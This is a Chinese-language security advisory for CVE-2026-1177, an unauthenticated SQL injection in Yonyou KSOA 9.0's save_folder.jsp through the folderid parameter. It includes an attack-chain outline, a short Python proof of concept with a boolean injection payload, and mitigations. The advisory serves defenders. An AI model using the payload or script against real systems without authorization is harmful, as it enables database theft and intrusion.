CVE-2026-1177 用友KSOA 9.0 save_folder.jsp SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1177

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

用友KSOA 9.0

漏洞概述

CVE-2026-1177是影响用友KSOA 9.0的一个高危SQL注入漏洞。该漏洞存在于/kmf/save_folder.jsp文件中的HTTP GET参数处理组件，攻击者可以通过操纵folderid参数实现SQL注入攻击。由于该漏洞无需认证即可远程利用，且已公开利用代码，对使用该版本的用户构成严重安全威胁。攻击者利用此漏洞可窃取数据库中的敏感信息，包括用户凭证、业务数据等，甚至可能在特定条件下实现远程代码执行。用友公司已收到漏洞通报但未做出任何回应，建议用户立即采取防御措施。

技术细节

该漏洞位于用友KSOA 9.0的/kmf/save_folder.jsp页面，受影响组件为HTTP GET参数处理器。漏洞根源在于程序未对用户输入的folderid参数进行充分的输入验证和SQL语句过滤，导致攻击者可在HTTP请求中注入恶意SQL语句。攻击者利用UNION SELECT、布尔盲注或时间盲注等技术，可绕过认证直接获取数据库内容。由于漏洞位于HTTP参数处理层，攻击者可通过构造特殊的HTTP GET请求远程利用，无需任何认证凭据即可发起攻击。攻击成功后可读取数据库中的敏感数据，或利用SQL注入进一步进行权限提升和系统渗透。

攻击链分析

STEP 1

步骤1

扫描确认目标站点使用用友KSOA 9.0，识别/kmf/save_folder.jsp端点

STEP 2

步骤2

构造包含SQL注入payload的HTTP GET请求，参数为folderid

STEP 3

步骤3

发送恶意请求，利用UNION SELECT或盲注技术提取数据库信息

STEP 4

步骤4

获取数据库中的用户凭证、敏感业务数据等敏感信息

STEP 5

步骤5

利用获取的数据进行进一步渗透或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-1177 PoC - Yonyou KSOA 9.0 SQL Injection
Target: /kmf/save_folder.jsp
Parameter: folderid
"""
import requests
import sys

def test_sql_injection(target_url):
    """Test for SQL injection vulnerability in folderid parameter"""
    # Normal request
    normal_params = {'folderid': '1'}
    try:
        resp_normal = requests.get(f'{target_url}/kmf/save_folder.jsp', params=normal_params, timeout=10)
        print(f'[+] Normal request status: {resp_normal.status_code}')
    except requests.RequestException as e:
        print(f'[-] Normal request failed: {e}')
    
    # SQL injection test - Boolean based
    sqli_payload = "1' AND 1=1--"
    sqli_params = {'folderid': sqli_payload}
    try:
        resp_sqli = requests.get(f'{target_url}/kmf/save_folder.jsp', params=sqli_params, timeout=10)
        print(f'[+] SQLi test status: {resp_sqli.status_code}')
        if resp_sqli.status_code == 200:
            print('[+] Target may be vulnerable to SQL injection')
    except requests.RequestException as e:
        print(f'[-] SQLi test failed: {e}')

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python3 {sys.argv[0]} <target_url>')
        print(f'Example: python3 {sys.argv[0]} http://target.com')
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    test_sql_injection(target)

影响范围

Yonyou KSOA 9.0

防御指南

临时缓解措施

在正式补丁发布前，可通过以下措施临时缓解：1) 在Web应用防火墙(WAF)上添加SQL注入防护规则，拦截包含SQL关键字的folderid参数；2) 临时禁用/kmf/save_folder.jsp页面访问；3) 实施IP白名单限制，仅允许受信任的IP地址访问该功能；4) 加强数据库账户权限控制，限制应用账户权限最小化；5) 启用数据库审计日志，监控异常SQL查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1177
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1177
3 Details https://www.cvedetails.com/cve/CVE-2026-1177/
4 VulDB https://vuldb.com/cve/CVE-2026-1177
5 Link https://github.com/LX-66-LX/cve/issues/17
6 Link https://vuldb.com/?ctiid.341771
7 Link https://vuldb.com/?id.341771
8 Link https://vuldb.com/?submit.734577